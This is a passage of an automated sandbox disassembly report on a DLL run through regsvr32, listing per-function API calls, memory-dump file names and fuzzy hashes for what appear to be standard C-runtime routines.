                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC66D7E292
                                                                                                                            • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC66D7E2B1
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC66D7E356
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC66D7E3B5
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC66D7E3F0
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC66D7E42C
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC66D7E46C
                                                                                                                            • free.LIBCMT ref: 00007FFC66D7E47A
                                                                                                                            • free.LIBCMT ref: 00007FFC66D7E49C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$Infofree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1638741495-0
                                                                                                                            • Opcode ID: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                                                                            • Instruction ID: d58982e6a1bc070a5182d88e48ddd106580320fcd61381e88b589647cc1e627c
                                                                                                                            • Opcode Fuzzy Hash: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                                                                            • Instruction Fuzzy Hash: 2461F832A0C6E5C6E7288F2194401B9AAD1FF447ACF544635DA9D0BBE4DF3CD541EB21
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2551688548-0
                                                                                                                            • Opcode ID: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                                                                            • Instruction ID: ab2573033f5806367e5f90ae4107da546acfadfbf168ea1190a03b4b8b09c51f
                                                                                                                            • Opcode Fuzzy Hash: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                                                                            • Instruction Fuzzy Hash: 8541A521A1E6BAD0EB589B01E84413DAA94BF48784F540039E9CD0F795DF3CE851EF62
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC66D79206), ref: 00007FFC66D78F94
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC66D79206), ref: 00007FFC66D78FA6
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC66D79206), ref: 00007FFC66D79006
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC66D79206), ref: 00007FFC66D790BC
                                                                                                                            • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC66D79206), ref: 00007FFC66D790D3
                                                                                                                            • free.LIBCMT ref: 00007FFC66D790E4
                                                                                                                            • GetStringTypeA.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC66D79206), ref: 00007FFC66D79161
                                                                                                                            • free.LIBCMT ref: 00007FFC66D79171
                                                                                                                              • Part of subcall function 00007FFC66D7E23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC66D7E292
                                                                                                                              • Part of subcall function 00007FFC66D7E23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC66D7E2B1
                                                                                                                              • Part of subcall function 00007FFC66D7E23C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC66D7E3B5
                                                                                                                              • Part of subcall function 00007FFC66D7E23C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC66D7E3F0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3535580693-0
                                                                                                                            • Opcode ID: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                                                                            • Instruction ID: 0647598b82d4de45c3efc260cc87ffc4357519b5c38030a10ec2591a31368119
                                                                                                                            • Opcode Fuzzy Hash: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                                                                            • Instruction Fuzzy Hash: 6661A632B1C6AAC6D7249F22D444478AB96FB44BE8B140235EE9D1FBD4CE3CE841DB51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetStartupInfoA.KERNEL32 ref: 00007FFC66D7377D
                                                                                                                              • Part of subcall function 00007FFC66D73108: Sleep.KERNEL32(?,?,0000000A,00007FFC66D72DA3,?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D7314D
                                                                                                                            • GetFileType.KERNEL32 ref: 00007FFC66D738FA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileInfoSleepStartupType
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1527402494-2766056989
                                                                                                                            • Opcode ID: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                                                                            • Instruction ID: 744bb17308a0f3677d09fbd3dcfd8fa5b5c39a2f72eac93cba55013bfb935cda
                                                                                                                            • Opcode Fuzzy Hash: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                                                                            • Instruction Fuzzy Hash: CC91E122A1C6AAC1E7188B24C448268AB94FB11774F264735C6FD4B3D0DF3CEC41EB22
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_getptd
                                                                                                                            • String ID: +$-$0$0
                                                                                                                            • API String ID: 3432092939-699404926
                                                                                                                            • Opcode ID: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                                                                            • Instruction ID: eeaaff9f11737616bd3b3a5a8bcf482ea049b2aaa213340fc2af8527ae92ec88
                                                                                                                            • Opcode Fuzzy Hash: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                                                                            • Instruction Fuzzy Hash: 7F710422D0C6FAC1F7BD4615851537AAE90AF4475CF254236CADE0A2D1DE3CE980EB63
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _FF_MSGBANNER.LIBCMT ref: 00007FFC66D76ADF
                                                                                                                              • Part of subcall function 00007FFC66D76F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFC66D77194,?,?,?,?,00007FFC66D76C69,?,?,00000000,00007FFC66D730C0), ref: 00007FFC66D76FCF
                                                                                                                              • Part of subcall function 00007FFC66D7334C: ExitProcess.KERNEL32 ref: 00007FFC66D7335B
                                                                                                                              • Part of subcall function 00007FFC66D7309C: Sleep.KERNEL32(?,?,00000000,00007FFC66D76B19,?,?,00000000,00007FFC66D76BC3,?,?,?,?,?,?,00000000,00007FFC66D72DC8), ref: 00007FFC66D730D2
                                                                                                                            • _errno.LIBCMT ref: 00007FFC66D76B21
                                                                                                                            • _lock.LIBCMT ref: 00007FFC66D76B35
                                                                                                                            • free.LIBCMT ref: 00007FFC66D76B57
                                                                                                                            • _errno.LIBCMT ref: 00007FFC66D76B5C
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FFC66D76BC3,?,?,?,?,?,?,00000000,00007FFC66D72DC8,?,?,?,00007FFC66D72DFF), ref: 00007FFC66D76B82
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1354249094-0
                                                                                                                            • Opcode ID: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                                                                            • Instruction ID: 67a06258c8225cd27a74cb38bd3a6fcd2948a4d5c6ccb773fc19929b4628adf1
                                                                                                                            • Opcode Fuzzy Hash: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                                                                            • Instruction Fuzzy Hash: D4216220E1C6AAC1F6586B12945437DAA54EF45794F045035E5CE4E6C2DF3CF840EF62
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D72D7A
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D72D88
                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D72DE0
                                                                                                                              • Part of subcall function 00007FFC66D73108: Sleep.KERNEL32(?,?,0000000A,00007FFC66D72DA3,?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D7314D
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D72DB4
                                                                                                                            • free.LIBCMT ref: 00007FFC66D72DD7
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00007FFC66D72DC8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3106088686-0
                                                                                                                            • Opcode ID: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                                                                            • Instruction ID: 2096a74bea516eb35fdf1b99ccb8c7cefb7c8e48f1c62d05ec368042075e421a
                                                                                                                            • Opcode Fuzzy Hash: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                                                                            • Instruction Fuzzy Hash: E201A020A0D79BC2FB1C5F6694581386691BF88764F544138C99D0E3D5DE3CE444EE71
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1012874770-0
                                                                                                                            • Opcode ID: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                                                                            • Instruction ID: 55aa711621f72293643859b3e4eef80cccb1c55100aa6f87b56a3014ac5e46e9
                                                                                                                            • Opcode Fuzzy Hash: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                                                                            • Instruction Fuzzy Hash: 3801E813A1D47ED1EF6DDB62D4520389761AF90711F451031D68E8E695CE6DF880EB32
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1294909896-0
                                                                                                                            • Opcode ID: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                                                                            • Instruction ID: b905947fdf97ee6e5b5c53851863f73cd7d9d254cfe6e7bfbb33dcbe5b9ee14d
                                                                                                                            • Opcode Fuzzy Hash: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                                                                            • Instruction Fuzzy Hash: D3B18E32B1CB99C6EB28DB22E4405AAABA0FB85744F504531EACD4B785DF3CE105DB51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$Sleep_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2081351063-0
                                                                                                                            • Opcode ID: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                                                                            • Instruction ID: 32cb44cdeae8416afe93d133e9ee63b6dd44c18b08d37289ffb091bf5e936e96
                                                                                                                            • Opcode Fuzzy Hash: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                                                                            • Instruction Fuzzy Hash: 75312131A0C6AAC1EB1D9F27C45527DAA91AF44FC4F458035DE8D0F796EE2CE840DB62
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • DecodePointer.KERNEL32(?,?,?,00007FFC66D773E5,?,?,?,?,00007FFC66D734D2,?,?,?,00007FFC66D721CB), ref: 00007FFC66D772FD
                                                                                                                            • DecodePointer.KERNEL32(?,?,?,00007FFC66D773E5,?,?,?,?,00007FFC66D734D2,?,?,?,00007FFC66D721CB), ref: 00007FFC66D7730C
                                                                                                                            • EncodePointer.KERNEL32(?,?,?,00007FFC66D773E5,?,?,?,?,00007FFC66D734D2,?,?,?,00007FFC66D721CB), ref: 00007FFC66D77389
                                                                                                                              • Part of subcall function 00007FFC66D7318C: realloc.LIBCMT ref: 00007FFC66D731B7
                                                                                                                              • Part of subcall function 00007FFC66D7318C: Sleep.KERNEL32(?,?,00000000,00007FFC66D77379,?,?,?,00007FFC66D773E5,?,?,?,?,00007FFC66D734D2), ref: 00007FFC66D731D3
                                                                                                                            • EncodePointer.KERNEL32(?,?,?,00007FFC66D773E5,?,?,?,?,00007FFC66D734D2,?,?,?,00007FFC66D721CB), ref: 00007FFC66D77398
                                                                                                                            • EncodePointer.KERNEL32(?,?,?,00007FFC66D773E5,?,?,?,?,00007FFC66D734D2,?,?,?,00007FFC66D721CB), ref: 00007FFC66D773A4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1310268301-0
                                                                                                                            • Opcode ID: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                                                                            • Instruction ID: f0671d7baa28277179e75e72de4d7e29bab7e64997cbc2fb6bd17802bcb87d39
                                                                                                                            • Opcode Fuzzy Hash: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                                                                            • Instruction Fuzzy Hash: EF21E210B0E6AAE1EA18AB22E9440B9E751FB44BC4F500835DDCD0F756DE3CF445EB22
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1310268301-0
                                                                                                                            • Opcode ID: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                                                                            • Instruction ID: 4e32579a95c8baf5a9795458a380d19abcd96321092773462d8d2623ad03ed5a
                                                                                                                            • Opcode Fuzzy Hash: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                                                                            • Instruction Fuzzy Hash: 5D21AF20A0E6AAE4EE28EB12A545169E651AB45BC4F580835EEDD0F356DE3CF044DB21
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FFC66D73359,?,?,00000028,00007FFC66D76C7D,?,?,00000000,00007FFC66D730C0,?,?,00000000,00007FFC66D76B19), ref: 00007FFC66D7331F
                                                                                                                            • GetProcAddress.KERNEL32(?,?,000000FF,00007FFC66D73359,?,?,00000028,00007FFC66D76C7D,?,?,00000000,00007FFC66D730C0,?,?,00000000,00007FFC66D76B19), ref: 00007FFC66D73334
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                            • API String ID: 1646373207-1276376045
                                                                                                                            • Opcode ID: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                                                                            • Instruction ID: 0fb7d71e747164d92a9fc269d118c417c9fbbab7c7e1dcf85ae76079c6ec3876
                                                                                                                            • Opcode Fuzzy Hash: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                                                                            • Instruction Fuzzy Hash: DFE01250F1D61AC1FF1D5B51A8A813422E06F58BA5B48543CC89F0E3A0DE6CAE98EB70
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00007FFC66D7309C: Sleep.KERNEL32(?,?,00000000,00007FFC66D76B19,?,?,00000000,00007FFC66D76BC3,?,?,?,?,?,?,00000000,00007FFC66D72DC8), ref: 00007FFC66D730D2
                                                                                                                            • free.LIBCMT ref: 00007FFC66D758A5
                                                                                                                            • free.LIBCMT ref: 00007FFC66D758C1
                                                                                                                              • Part of subcall function 00007FFC66D76550: RtlCaptureContext.KERNEL32 ref: 00007FFC66D7658F
                                                                                                                              • Part of subcall function 00007FFC66D76550: IsDebuggerPresent.KERNEL32 ref: 00007FFC66D7662D
                                                                                                                              • Part of subcall function 00007FFC66D76550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFC66D76637
                                                                                                                              • Part of subcall function 00007FFC66D76550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFC66D76642
                                                                                                                              • Part of subcall function 00007FFC66D76550: GetCurrentProcess.KERNEL32 ref: 00007FFC66D76658
                                                                                                                              • Part of subcall function 00007FFC66D76550: TerminateProcess.KERNEL32 ref: 00007FFC66D76666
                                                                                                                            • free.LIBCMT ref: 00007FFC66D758D6
                                                                                                                              • Part of subcall function 00007FFC66D73024: HeapFree.KERNEL32(?,?,00000000,00007FFC66D72DDC,?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D7303A
